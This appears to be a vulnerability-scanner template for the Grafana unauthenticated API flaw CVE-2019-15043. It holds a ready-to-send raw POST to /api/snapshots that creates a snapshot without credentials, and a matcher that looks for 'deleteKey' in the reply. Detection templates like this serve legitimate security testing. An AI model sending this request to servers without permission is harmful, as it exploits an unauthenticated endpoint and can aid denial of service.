31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: CVE-2019-15043
|
|
info:
|
|
author: bing0o
|
|
name: Grafana unauthenticated API
|
|
severity: medium
|
|
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
|
reference: |
|
|
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
|
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
|
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
|
tags: cve,cve2019,grafana
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /api/snapshots HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Content-Length: 235
|
|
Accept: */*
|
|
Accept-Language: en
|
|
Content-Type: application/json
|
|
|
|
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
|
|
|
matchers:
|
|
- part: body
|
|
type: word
|
|
words:
|
|
- deleteKey
|